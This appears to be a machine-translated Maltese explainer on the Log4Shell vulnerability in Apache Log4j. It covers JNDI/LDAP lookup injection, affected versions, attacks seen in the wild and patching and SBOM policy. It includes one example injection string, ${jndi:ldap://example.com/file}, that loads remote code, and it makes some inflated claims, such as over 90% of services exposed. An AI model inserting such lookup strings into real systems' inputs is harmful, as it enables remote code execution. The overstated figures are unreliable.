Werrej[Aħbi][Uri]
Fl-aħħar ta’ Novembru 2021, skoprejna theddida kbira għaċ-ċibersigurtà. Dan l-isfruttament jista' jaffettwa miljuni ta' sistemi tal-kompjuter madwar id-dinja.
Din hija gwida dwar il-vulnerabbiltà tal-Log4j u kif difett tad-disinn injorat ħalliet aktar minn 90% tas-servizzi tal-kompjuter fid-dinja miftuħa għall-attakk.
Apache Log4j hija utilità ta' illoggjar ibbażata fuq Java ta' sors miftuħ żviluppata mill-Apache Software Foundation. Miktub oriġinarjament minn Ceki Gülcü fl-2001, issa huwa parti minn Apache Logging Services, proġett tal-Apache Software Foundation.
Kumpaniji madwar id-dinja jużaw il-librerija Log4j biex jippermettu l-illoggjar fuq l-applikazzjonijiet tagħhom. Fil-fatt, il-librerija Java hija tant kullimkien, tista 'ssibha f'applikazzjonijiet minn Amazon, Microsoft, Google, u aktar.
Il-prominenza tal-librerija tfisser li kwalunkwe difett potenzjali fil-kodiċi jista 'jħalli miljuni ta' kompjuters miftuħa għall-hacking. Fl-24 ta’ Novembru 2021, a sigurtà tas-sħab riċerkatur li jaħdem għal Alibaba skopra difett terribbli.
Il-vulnerabbiltà Log4j, magħrufa wkoll bħala Log4Shell, ilha teżisti bla skop mill-2013. Il-vulnerabbiltà ppermettiet atturi malizzjużi biex imexxu kodiċi fuq sistemi affettwati li jmexxu Log4j. Ġie żvelat pubblikament fid-9 ta’ Diċembru 2021
Esperti tal-industrija jsejħu d-difett Log4Shell il- l-akbar vulnerabbiltà fil-memorja riċenti.
Fil-ġimgħa ta’ wara l-pubblikazzjoni tal-vulnerabbiltà, timijiet taċ-ċibersigurtà skoprew miljuni ta’ attakki. Xi riċerkaturi saħansitra osservaw rata ta 'aktar minn mitt attakk kull minuta.
Kif taħdem?
Biex nifhmu għaliex Log4Shell huwa tant perikoluż, irridu nifhmu għalxiex kapaċi.
Il-vulnerabbiltà Log4Shell tippermetti eżekuzzjoni ta 'kodiċi arbitrarja, li bażikament tfisser li attakkant jista' jmexxi kwalunkwe kmand jew kodiċi fuq magna fil-mira.
Kif twettaq dan?
L-ewwel, irridu nifhmu x'inhu l-JNDI.
Il-Java Naming and Directory Interface (JNDI) huwa servizz Java li jippermetti lill-programmi Java jiskopru u jfittxu dejta u riżorsi permezz ta' isem. Dawn is-servizzi tad-direttorju huma importanti għaliex jipprovdu sett organizzat ta' rekords għall-iżviluppaturi biex jirreferu faċilment meta joħolqu applikazzjonijiet.
Il-JNDI jista' juża diversi protokolli biex jaċċessa ċertu direttorju. Wieħed minn dawn il-protokolli huwa l-Protokoll ta' Aċċess għad-Direttorju ħafif, jew LDAP.
Meta tilloggja string, log4j twettaq sostituzzjonijiet ta' string meta jiltaqgħu ma' espressjonijiet tal-forma ${prefix:name}
.
Per eżempju, Text: ${java:version}
jista' jiġi illoggjat bħala Test: Java verżjoni 1.8.0_65. Dawn it-tipi ta' sostituzzjonijiet huma komuni.
Jista’ jkollna wkoll espressjonijiet bħal Text: ${jndi:ldap://example.com/file}
li juża s-sistema JNDI biex jgħabbi oġġett Java minn URL permezz tal-protokoll LDAP.
Dan effettivament jgħabbi d-dejta li ġejja minn dak il-URL fil-magna. Kwalunkwe hacker potenzjali jista 'jospita kodiċi malizzjuż fuq URL pubbliku u stenna għal magni li jużaw Log4j biex jirreġistraw.
Peress li l-kontenut tal-messaġġi log fih data kkontrollata mill-utent, il-hackers jistgħu jdaħħlu r-referenzi JNDI tagħhom stess li jindikaw is-servers LDAP li huma jikkontrollaw. Dawn is-servers LDAP jistgħu jkunu mimlija b'oġġetti Java malizzjużi li l-JNDI jista' jesegwixxi permezz tal-vulnerabbiltà.
Dak li jagħmel dan agħar huwa li ma jimpurtax jekk l-applikazzjoni hijiex applikazzjoni fuq in-naħa tas-server jew fuq in-naħa tal-klijent.
Sakemm ikun hemm mod kif il-logger jaqra l-kodiċi malizzjuż tal-attakkant, l-applikazzjoni għadha miftuħa għall-isfruttamenti.
Min hu affettwat?
Il-vulnerabbiltà taffettwa s-sistemi u s-servizzi kollha li jużaw APache Log4j, b'verżjonijiet 2.0 sa u inkluż 2.14.1.
Diversi esperti tas-sigurtà jagħtu parir li l-vulnerabbiltà tista’ taffettwa għadd ta’ applikazzjonijiet li jużaw Java.
Id-difett ġie skopert għall-ewwel darba fil-logħba tal-kompjuter Minecraft ta' Microsoft. Microsoft ħeġġet lill-utenti tagħhom biex jaġġornaw is-softwer Minecraft tal-edizzjoni Java tagħhom biex jipprevjenu kwalunkwe riskju.
Jen Easterly, id-Direttur taċ-Ċibersigurtà u l-Aġenzija tas-Sigurtà tal-Infrastruttura (CISA) tgħid li l-bejjiegħa għandhom responsabbiltà kbira biex jipprevjeni lill-utenti finali minn atturi malizzjużi li jisfruttaw din il-vulnerabbiltà.
"Il-bejjiegħa għandhom ukoll jikkomunikaw mal-klijenti tagħhom biex jiżguraw li l-utenti finali jkunu jafu li l-prodott tagħhom fih din il-vulnerabbiltà u għandhom jagħtu prijorità lill-aġġornamenti tas-softwer."
Allegatament, l-attakki diġà bdew. Symantec, kumpanija li tipprovdi softwer taċ-ċibersigurtà, osservat numru varjat ta’ talbiet ta’ attakk.
Hawn huma xi eżempji tat-tipi ta 'attakki li r-riċerkaturi sabu:
- botnets
Il-botnets huma netwerk ta' kompjuters li huma taħt il-kontroll ta' parti waħda li tattakka. Jgħinu biex iwettqu attakki DDoS, jisirqu data, u scams oħra. Ir-riċerkaturi osservaw il-botnet Muhstik fi skripts tal-qoxra mniżżla mill-isfruttament Log4j.
- XMRig Miner Trojan
XMRig huwa minatur tal-kripto-munita open-source li juża CPUs biex jimmina t-token Monero. Iċ-ċiberkriminali jistgħu jinstallaw XMRig fuq it-tagħmir tan-nies sabiex ikunu jistgħu jużaw is-saħħa tal-ipproċessar tagħhom mingħajr ma jkunu jafu.
- Khonsari Ransomware
Ransomware jirreferi għal forma ta 'malware maħsuba biex kriptaġġ fajls fuq kompjuter. L-attakkanti jistgħu mbagħad jitolbu ħlas bi skambju biex jagħtu aċċess lura għall-fajls kriptati. Ir-riċerkaturi skoprew ir-ransomware Khonsari fl-attakki Log4Shell. Huma jimmiraw għas-servers tal-Windows u jagħmlu użu mill-qafas .NET.
X'jiġri wara?
L-esperti jbassru li jista 'jieħu xhur jew forsi anke snin biex jirranġa bis-sħiħ il-kaos miġjub mill-vulnerabbiltà Log4J.
Dan il-proċess jinvolvi l-aġġornament ta 'kull sistema affettwata b'verżjoni patched. Anke jekk dawn is-sistemi kollha huma patched, għad hemm it-theddida imminenti ta 'backdoors possibbli li l-hackers setgħu diġà żiedu mat-tieqa li s-servers kienu miftuħa għall-attakk.
Ħafna soluzzjonijiet u mitigazzjonijiet jeżistu biex jipprevjenu applikazzjonijiet milli jiġu sfruttati minn dan il-bug. Il-verżjoni l-ġdida ta' Log4j 2.15.0-rc1 biddlet diversi settings biex tittaffa din il-vulnerabilità.
Il-karatteristiċi kollha li jużaw JNDI se jkunu diżattivati awtomatikament u l-lokki mill-bogħod ġew ristretti wkoll. Id-diżattivazzjoni tal-karatteristika ta 'tfittxija fuq is-setup Log4j tiegħek tgħin biex tnaqqas ir-riskju ta' sfrutti possibbli.
Barra minn Log4j, għad hemm il-ħtieġa għal pjan usa' biex jipprevjeni l-isfruttamenti ta' sors miftuħ.
Aktar kmieni f'Mejju, il-White House ħarġet an Ordni eżekuttiva li kellu l-għan li jtejjeb iċ-ċibersigurtà nazzjonali. Din kienet tinkludi dispożizzjoni għal polza ta' materjali tas-softwer (SBOM) li essenzjalment kienet dokument formali li kien fih lista ta' kull oġġett meħtieġ biex tinbena l-applikazzjoni.
Dan jinkludi partijiet bħall- sors miftuħ pakketti, dipendenzi, u APIs użati għall-iżvilupp. Għalkemm l-idea tal-SBOMs huma ta' għajnuna għat-trasparenza, se tgħin tassew lill-konsumatur?
It-titjib tad-dipendenzi jista' jkun ta' battikata wisq. Il-kumpaniji jistgħu jagħżlu biss li jħallsu xi multi aktar milli jirriskjaw li jaħlu ħin żejjed biex isibu pakketti alternattivi. Forsi dawn l-SBOMs ikunu utli biss jekk tagħhom ambitu hija limitata aktar.
konklużjoni
Il-kwistjoni Log4j hija aktar minn sempliċi problema teknika għall-organizzazzjonijiet.
Il-mexxejja tan-negozju għandhom ikunu konxji tar-riskji potenzjali li jistgħu jseħħu meta s-servers, il-prodotti jew is-servizzi tagħhom jiddependu fuq kodiċi li huma stess ma jżommux.
Li tiddependi fuq applikazzjonijiet ta' sors miftuħ u ta' partijiet terzi dejjem tiġi b'xi ammont ta' riskju. Il-kumpaniji għandhom jikkunsidraw li jaħdmu strateġiji ta' mitigazzjoni tar-riskju qabel ma joħorġu theddidiet ġodda.
Ħafna mill-web tiddependi fuq softwer open-source miżmum minn eluf ta’ voluntiera madwar id-dinja.
Jekk irridu nżommu l-web post sigur, il-gvernijiet u l-korporazzjonijiet għandhom jinvestu fil-finanzjament ta’ sforzi ta’ sors miftuħ u aġenziji taċ-ċibersigurtà bħal CISA.
Ħalli Irrispondi